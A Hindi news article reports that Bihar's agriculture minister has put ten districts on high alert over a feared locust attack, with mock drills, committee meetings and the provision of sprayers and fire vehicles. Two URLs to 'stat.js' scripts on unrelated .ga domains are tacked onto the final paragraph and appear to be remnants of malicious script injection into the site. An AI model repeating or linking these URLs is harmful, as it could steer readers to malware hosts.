बिहार के कृषि मंत्री डॉ. प्रेम कुमार ने कहा है कि टिड्डी दल के प्रकोप की आशंका को देखते हुए उत्तर प्रदेश से सटे बिहार के 10 जिलों में हाई अलर्ट जारी करते हुए आवश्यक तैयारियां पूरी कर ली गई हैं। कैमूर, रोहतास, बक्सर, भोजपुर, गया, औरंगाबाद, सारण, सीवान, गोपालगंज और पश्चिमी चंपारण जिलों की लगभग सभी पंचायतों में टिड्डी दल के संभावित आक्रमण से संबंधित चेतावनी और एडवाइजरी भी जारी कर दी गई है।

कृषि मंत्री डॉ. प्रेम कुमार ने उत्तरप्रदेश से सटे बिहार के राज्य के 10 जिलों को टिड्डियों के खतरे पर सतर्क रहने के लिए कहा है। कैमूर, रोहतास, बक्सर, भोजपुर, गया, औरंगाबाद, सारण, सीवान गोपालगंज व पश्चिम चंपारण को सतर्क रहने की जरूरत है। इसके लिए आवश्यक तैयारी करने के लिए भी कहा है। पिछले दिनों उत्तरप्रदेश में टिड्डियों के प्रकोप के बाद बिहार सतर्क हुआ था। हालांकि बाद में टिड्डियों का दल एमपी की तरफ मुड़ गया था।

उन्होंने कहा कि उत्तर प्रदेश राज्य से सटे बिहार के जिलों की 24 पंचायतों में मॉक ड्रिल भी कराई गई है। जिला स्तर पर जिलाधिकारी की अध्यक्षता में नियंत्रण समिति की बैठक प्रत्येक गुरुवार और प्रखंड, पंचायत स्तर पर प्रत्येक मंगलवार को कराई जा रही है। संभावित क्षेत्रों के लिए कृषि रक्षा रसायनों, स्प्रेमयर्स व ट्रैक्टर्स की व्यवस्था कर ली गई है। सघन सर्वेक्षण द्वारा टिड्डियों के संभावित आश्रय स्थल को भी चिह्नित किया जा रहा है।

ट्रैक्टर माउंटेड स्प्रेयर्स, अग्निशमन विभाग की गाड़ियों व मानव संसाधन की उपलब्धि संबंधी सूची तैयार की जा रही है। उन्होंने कहा कि टिड्डी दल के प्रकोप की दशा में अग्निशमन विभाग की भूमिका अधिक उपयोगी है। पाकिस्तान से टिड्डियों के भारतीय सीमा में घुसने का प्रवेश द्वार बन चुके जैसलमेर एवं बाड़मेर में टिड्डियों से खतरा बढ़ता जा रहा है। वहीं, वायुसेना एयरबेस पर गाइडलाइन जारी कर एहतियातन कई कदम उठाए गए हैं।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.